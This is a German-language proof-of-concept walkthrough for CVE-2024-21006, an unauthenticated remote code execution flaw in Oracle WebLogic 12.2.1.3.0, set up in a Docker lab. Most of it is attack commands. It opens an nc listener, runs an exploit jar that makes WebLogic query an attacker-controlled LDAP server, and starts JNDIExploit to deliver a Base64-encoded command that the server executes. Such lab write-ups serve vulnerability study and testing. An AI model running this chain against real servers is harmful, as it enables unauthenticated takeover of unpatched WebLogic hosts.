
Remote Code Execution (RCE) - Oracle WebLogic 12.2.1.3.0
CVE-2024-21006 ist eine kritische Remote-Code-Execution-Schwachstelle (RCE), die den Oracle WebLogic Server betrifft. Der Fehler hängt mit der unsicheren Verwendung des IIOP-Protokolls (Internet Inter-ORB Protocol) und JNDI (Java Naming and Directory Interface) zusammen und ermöglicht es einem nicht authentifizierten Remote-Angreifer, über eine bösartige JNDI-Referenz beliebigen Code auf dem betroffenen Server auszuführen.
Richte die Umgebung ein:
docker-compose up -d
Um die Shell von Kali zu öffnen:
docker exec -it cve-2024-21006_poc-kali-1 /bin/bash
Um die Shell von WebLogic zu öffnen:
docker exec -it cve-2024-21006_poc-weblogic-1 /bin/bash
Um die Shell von ExploitBox zu öffnen:
docker exec -it exploitbox /bin/bash
In diesem Schritt haben wir eine lokal laufende Instanz von WebLogic 12.2.1.3.0: http://127.0.0.1:7001/console/login/LoginForm.jsp

Auf Kali:
nc -vnlp 1389
Auf ExploitBox:
java -jar CVE-2024-21006.jar <IP des WebLogic> 7001 ldap://<IP von Kali>:1389
Beachte, dass Kali die Verbindung vom WebLogic empfangen hat:

Starte auf Kali den JNDIExploit:
cd /exploit
java \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xml.internal.serializer=ALL-UNNAMED \
-jar JNDIExploit/JNDIExploit-1.3-SNAPSHOT.jar -i <IP von Kali>

Führe auf ExploitBox den Exploit aus:
java -jar CVE-2024-21006.jar <IP des WebLogic> 7001 "ldap://<IP von Kali>:1389/Basic/Command/Base64/<Base64-Befehl>"

Auf Kali siehst du, dass wir den Request empfangen haben:

Auf WebLogic siehst du, dass der Befehl ausgeführt und die Datei erfolgreich erstellt wurde:
